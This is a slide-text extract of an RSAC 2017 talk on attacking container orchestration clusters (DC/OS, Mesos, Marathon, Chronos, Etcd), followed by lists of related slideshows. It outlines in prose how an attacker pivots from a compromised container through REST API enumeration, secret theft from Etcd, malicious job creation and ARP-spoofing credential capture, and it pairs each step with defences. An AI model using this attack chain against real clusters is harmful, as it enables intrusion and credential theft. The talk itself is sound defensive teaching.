SlideShare a Scribd company logo

Orchestration Ownage - RSAC 2017

Bryce Kunz
Bryce Kunz

This document discusses potential security issues with container-based datacenter platforms like DC/OS and Mesos. It describes how an initial compromise of a vulnerable web application inside a container could allow an attacker to pivot and gain further access by exploiting features of Mesos DNS, the Mesos master and agents, Marathon and Chronos frameworks, and the Etcd configuration store. It recommends steps like disabling risky Mesos DNS features, enforcing authentication, and logically segmenting networks and configuration stores.

Technology
1 of 53
Download to read offline
SESSION ID:SESSION ID: #RSAC Bryce Kunz Orchestration Ownage: Exploiting Container-Centric Datacenter Platforms CSV-R03 Senior Threat Specialist Adobe Mike Mellor Director, Information Security Adobe
Presenter’s Company Logo – replace or delete on master slide #RSAC Intro 2 Mike Mellor Director, Information Security @ Adobe Bryce Kunz Senior Threat Specialist @ Adobe
Presenter’s Company Logo – replace or delete on master slide #RSAC Containers - The Future is Now! 3 2016 Surveys: 15-16% of all organizations are already using containers in production 35% organizations have done a proof-of-concept The Future is Now! Containers are in production now Containers are continuing to grow in popularity
Presenter’s Company Logo – replace or delete on master slide #RSAC Containers appear more secure 4 The biggest drivers: 39% to increase developer efficiency and 36% to support microservices Organizations want to avoid cloud platform lock-in 2016 Surveys: Many (42%) organizations gain value in the “secure/isolated” capabilities that containers provide
Presenter’s Company Logo – replace or delete on master slide #RSAC But managing Containers feels complex 5 2016 Survey: The more exposure an organization has to containers, The more complexities are exposed. Respondents said they found containers… “too complex to integrate into existing environments,” and require “too many skilled resources to manage.”
Presenter’s Company Logo – replace or delete on master slide #RSAC And are very challenging to manage at scale 6 2016 Survey: The #1 challenge of containers, according to the 53% of respondents who are either using or evaluating containers, is … “Container Management.”
Presenter’s Company Logo – replace or delete on master slide #RSAC Probable Security Nightmare 7 “Too Complex” + Challenging to Manage = Probable Security Nightmare “Complexity the Worst Enemy of Security” - Bruce Schneier
Presenter’s Company Logo – replace or delete on master slide #RSAC Container and Cluster Management Options 8 Technology Design Pros Cons Public Cloud Container Services Container Centric Easy, Scalable Vendor Lock-in; Proprietary Docker Swarm Docker Centric Native Clustering Limited by API Kubernetes Clusters of Containerized Apps Works w/ Docker; Mounts persistent volumes Custom overlay requires more specialization Mesos & DC/OS Cluster Management Works w/ Docker, Kubernetes, & Native Apps; Very Flexible Additional layers adds more complexities
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Cluster Management 9 CoreOS Linux OS Many servers in… DataCenter AWS Azure etc… How do we effectively use all of these resources? Datacenter, Azure, AWS, GCE, etc…
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Mesos Master & Agents 10 Mesos Master 5050/TCP by default Distributes Tasks Mesos Agent 5051/TCP by default Executes Tasks CoreOS Linux OS Datacenter, Azure, AWS, GCE, etc… Master AgentAgent
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Mesos is the Kernel of DC/OS 11 Mesos is the kernel of the distributed operating system known as DC/OS Datacenter, Azure, AWS, GCE, etc… Kernel: Master AgentAgent
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Frameworks 12 Frameworks provide the logic Init Jobs — Marathon Cron Jobs Chronos MetronomeDatacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Master AgentAgent
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Supporting: Configuration Stores 13 Configuration Stores keep everyone on the same page Zoo Keeper Etcd Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Supporting: Master AgentAgent
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Supporting: Discovery 14 Discovery Enables the finding of other services within the cluster Mesos DNS Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Supporting: Master AgentAgent
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server DC/OS Design 15 Containers w/ Apps Docker Containers Web Apps etc… Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Internet Accessible Containers 16 Containers w/ Apps Public Internet Accessible Private Internal Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Scenario 17 Initial Access (RCE) Via a vulnerable web application Into a container As limited user (e.g. www-data) Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC Scenario: RCE via web app within a container 18 e.g. JBoss, Tomcat, OSGi Console, Axis2, etc…
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos DNS 19 Query via pivot: Mesos DNS 53/UDP & TCP — DNS service Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC .mesos TLD 20 The easy way to find services within the cluster
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos DNS 21 Query via pivot: Mesos DNS 8123/TCP by default — DNS via REST API Service Discover — within the Cluster Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC Undocumented? 22 /v1/enumerate -> all mesos dns information
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos DNS using REST API 23 /v1/enumerate -> all mesos dns information
Presenter’s Company Logo – replace or delete on master slide #RSAC Find IP & RHP TCP ports of all services 24 /v1/enumerate -> all mesos dns information
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Disable Risky Mesos DNS Features 25 Disable the… “AXFR” “Enumerate” API Calls • Harder for attacker to discover all services • Applications shouldn’t commonly be using these API callsDatacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos Master 26 Query via pivot: Mesos Master 5050/TCP by default Distributes Tasks Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Master 27 Request via the REST API
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Master 28 Response: json w/ all Mesos Agent’s IP addresses within the cluster
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Recon via Mesos DNS 29 Query via pivot: Mesos Agent 5051/TCP by default Executes Tasks Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Agent 30 Request via the REST API
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Mesos Agent 31 Response: json w/ what containers are currently running on the server (i.e. basic0012)
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Logical Internal Network Segmentation 32 Separates out the network into zones: Apps w/ Data Management Commonly with Calico, Canal, or FlannelDatacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secrets via Configuration Store 33 Etcd RHP/TCP by default — 2379/TCP client/server — 2380/TCP peers Configuration Store — Core OS Fleets Units — Applications ZooKeeper 2181/TCP by default — Binary Protocol Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Etcd 34 Request via the REST API recursively
Presenter’s Company Logo – replace or delete on master slide #RSAC Enumerate Etcd 35 Response: json frequently containing secrets including credentials
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Separate Configuration Stores 36 Separate out the configuration stores into zones: Apps w/ Data Management Enforce separation via… Authentication Credentials and Logical Network Segmentation Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Frameworks 37 Marathon Long Running Services — e.g. Containers Ensures always running Chronos Cron for the Cluster Batch Jobs Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC RCE via Marathon Jobs 38 Request via the REST API
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server RCE via Marathon Jobs 39 Marathon Long Running Services — e.g. Containers Ensures always running Chronos Cron for the Cluster Batch Jobs Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC RCE via Marathon Jobs 40 Response: json with the malicious job status
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server RCE via Chronos Jobs 41 Marathon Long Running Services — e.g. Containers Ensures always running Chronos Cron for the Cluster Batch Jobs Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: Enforce Authentication 42 Applications must… support and be configured to use authentication as well securely store and use credentials be deployed securely and/or retrieve credentials securely Alert on brute force attempts Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Creds via MitM with ARP Spoofing 43 Another Container has the Creds for Marathon Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Creds via MitM with ARP Spoofing 44 Attacker uses ARP spoofing to redirect that containers traffic to the compromised container Attacker collect the credentials Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE ARP
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Creds via MitM with ARP Spoofing 45 Attacker can now create malicious Marathon jobs Negating authentication security controls Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE ARP RCE
Presenter’s Company Logo – replace or delete on master slide #RSAC ServerServer Server Secure: TLS for Internal Communications 46 Enable TLS w/ valid certificates for strong HTTPS communications Anything using credentials needs TLS! Validate Certificates Fail closed on bad certificates Alert on certificates errors Datacenter, Azure, AWS, GCE, etc… Kernel: Frameworks: Apps: Supporting: Master AgentAgent Cntr App Cntr App Cntr App Cntr App Internet RCE ARP
Presenter’s Company Logo – replace or delete on master slide #RSAC Strategic Actions 47 Next week: Assess which services you can enable Authentication & TLS on — w/o breaking your existing applications within the cluster Three months from now: Implement Authentication & TLS on safe services and frameworks — Focusing on services responsible for orchestration within the cluster Deploy separate services where possible for Apps that do not support TLS & Auth Six months from now: Retrofit all Applications within the cluster to use TLS & Authentication Enforce the use of TLS & Authentication internal everywhere (disable clear-text)
Presenter’s Company Logo – replace or delete on master slide #RSAC Big Picture 48 Container Adoption Is Maturing, especially in Enterprises Enterprises are using containers in production.
Presenter’s Company Logo – replace or delete on master slide #RSAC Big Picture 49 Pivoting from a compromised service within the cluster No container breakout / 0day / exploit needed J May enable an attacker to completely compromise the cluster
Presenter’s Company Logo – replace or delete on master slide #RSAC Big Picture 50 Looking Beyond the Border with a Defense in Depth strategy Secures the Future & the cluster
Presenter’s Company Logo – replace or delete on master slide #RSAC Thank you! 51 Thank you!
Presenter’s Company Logo – replace or delete on master slide #RSAC Future Research 52 Testing MitM from compromised container NCC Group’s report states this is possible for co-hosted containers Test downgrade HTTPS communications Can we downgrade from HTTPS to HTTP and capture creds from another container? Test Certs (e.g. can cert pinning be enabled?) to REST APIs Can we MitM and impersonate the API service? Test Authentication Brute force attacks Fairly certain there are no lockouts, can we enable better authentication security? — Write module to brute-force and guess creds Test Logical Network Segmentation Tools Calico, Canal, Flannel — Note: these should work as advertised but probably we should independently verify
Presenter’s Company Logo – replace or delete on master slide #RSAC References 53 https://www.cloudfoundry.org/wp-content/uploads/2016/06/Cloud- Foundry-2016-Container-Report.pdf https://clusterhq.com/assets/pdfs/state-of-container-usage-june- 2016.pdf http://www.rightscale.com/blog/cloud-industry-insights/new-devops- trends-2016-state-cloud-survey

Recommended

Pwned Cloud Society - BsidesSLC 2017
Pwned Cloud Society - BsidesSLC 2017Pwned Cloud Society - BsidesSLC 2017
Pwned Cloud Society - BsidesSLC 2017
Bryce Kunz
 
(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure
Amazon Web Services
 
Migrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECSMigrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECS
Amazon Web Services
 
Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)
Julien SIMON
 
Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)
Julien SIMON
 
Build A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million UsersBuild A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million Users
Amazon Web Services
 
AWS Deployment Best Practices
AWS Deployment Best PracticesAWS Deployment Best Practices
AWS Deployment Best Practices
Amazon Web Services
 
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Amazon Web Services
 

Recommended

Pwned Cloud Society - BsidesSLC 2017
Pwned Cloud Society - BsidesSLC 2017Pwned Cloud Society - BsidesSLC 2017
Pwned Cloud Society - BsidesSLC 2017
Bryce Kunz
 
(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure
Amazon Web Services
 
Migrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECSMigrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECS
Amazon Web Services
 
Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)
Julien SIMON
 
Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)
Julien SIMON
 
Build A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million UsersBuild A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million Users
Amazon Web Services
 
AWS Deployment Best Practices
AWS Deployment Best PracticesAWS Deployment Best Practices
AWS Deployment Best Practices
Amazon Web Services
 
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Amazon Web Services
 
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Amazon Web Services
 
Rock Solid Deployment of Web Applications
Rock Solid Deployment of Web ApplicationsRock Solid Deployment of Web Applications
Rock Solid Deployment of Web Applications
Pablo Godel
 
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
Amazon Web Services
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Amazon Web Services
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
Amazon Web Services
 
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Amazon Web Services
 
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
Amazon Web Services
 
DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017
Amazon Web Services
 
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Amazon Web Services
 
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
Amazon Web Services
 
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced GroupAdvanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Amazon Web Services
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
Well-Architected for Security: Advanced Session
Well-Architected for Security: Advanced SessionWell-Architected for Security: Advanced Session
Well-Architected for Security: Advanced Session
Amazon Web Services
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
Amazon Web Services
 
Docker for Mac
Docker for MacDocker for Mac
Docker for Mac
Amazon Web Services
 
Deep Dive: AWS CloudHSM (Classic)
Deep Dive: AWS CloudHSM (Classic)Deep Dive: AWS CloudHSM (Classic)
Deep Dive: AWS CloudHSM (Classic)
Amazon Web Services
 
Application Delivery Patterns
Application Delivery PatternsApplication Delivery Patterns
Application Delivery Patterns
Shiva Narayanaswamy
 
Serverless Development To Production Pipeline
Serverless Development To Production PipelineServerless Development To Production Pipeline
Serverless Development To Production Pipeline
Chase Douglas
 
Defending your workloads with aws waf and deep security
Defending your workloads with aws waf and deep securityDefending your workloads with aws waf and deep security
Defending your workloads with aws waf and deep security
Mark Nunnikhoven
 
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
Amazon Web Services
 
Open Source in Security-Critical Environments
Open Source in Security-Critical EnvironmentsOpen Source in Security-Critical Environments
Open Source in Security-Critical Environments
Priyanka Aash
 
Open source-in-security-critical-environments
Open source-in-security-critical-environmentsOpen source-in-security-critical-environments
Open source-in-security-critical-environments
DESMOND YUEN
 

More Related Content

What's hot

Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Amazon Web Services
 
Rock Solid Deployment of Web Applications
Rock Solid Deployment of Web ApplicationsRock Solid Deployment of Web Applications
Rock Solid Deployment of Web Applications
Pablo Godel
 
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
Amazon Web Services
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Amazon Web Services
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
Amazon Web Services
 
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Amazon Web Services
 
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
Amazon Web Services
 
DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017
Amazon Web Services
 
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Amazon Web Services
 
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
Amazon Web Services
 
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced GroupAdvanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Amazon Web Services
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
Well-Architected for Security: Advanced Session
Well-Architected for Security: Advanced SessionWell-Architected for Security: Advanced Session
Well-Architected for Security: Advanced Session
Amazon Web Services
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
Amazon Web Services
 
Docker for Mac
Docker for MacDocker for Mac
Docker for Mac
Amazon Web Services
 
Deep Dive: AWS CloudHSM (Classic)
Deep Dive: AWS CloudHSM (Classic)Deep Dive: AWS CloudHSM (Classic)
Deep Dive: AWS CloudHSM (Classic)
Amazon Web Services
 
Application Delivery Patterns
Application Delivery PatternsApplication Delivery Patterns
Application Delivery Patterns
Shiva Narayanaswamy
 
Serverless Development To Production Pipeline
Serverless Development To Production PipelineServerless Development To Production Pipeline
Serverless Development To Production Pipeline
Chase Douglas
 
Defending your workloads with aws waf and deep security
Defending your workloads with aws waf and deep securityDefending your workloads with aws waf and deep security
Defending your workloads with aws waf and deep security
Mark Nunnikhoven
 
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
(GAM304) How Riot Games re:Invented Their AWS Model | AWS re:Invent 2014
Amazon Web Services
 

What's hot (20)

Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
 
Rock Solid Deployment of Web Applications
Rock Solid Deployment of Web ApplicationsRock Solid Deployment of Web Applications
Rock Solid Deployment of Web Applications
 
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
 
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
 
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
CSRA’s Migration to AWS GovCloud (US): An All-In Case Study | AWS Public Sect...
 
DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017
 
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
 
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
(SEC402) Intrusion Detection in the Cloud | AWS re:Invent 2014
 
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced GroupAdvanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
 
Well-Architected for Security: Advanced Session
Well-Architected for Security: Advanced SessionWell-Architected for Security: Advanced Session
Well-Architected for Security: Advanced Session
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
 
Docker for Mac
Docker for MacDocker for Mac
Docker for Mac
 
Deep Dive: AWS CloudHSM (Classic)
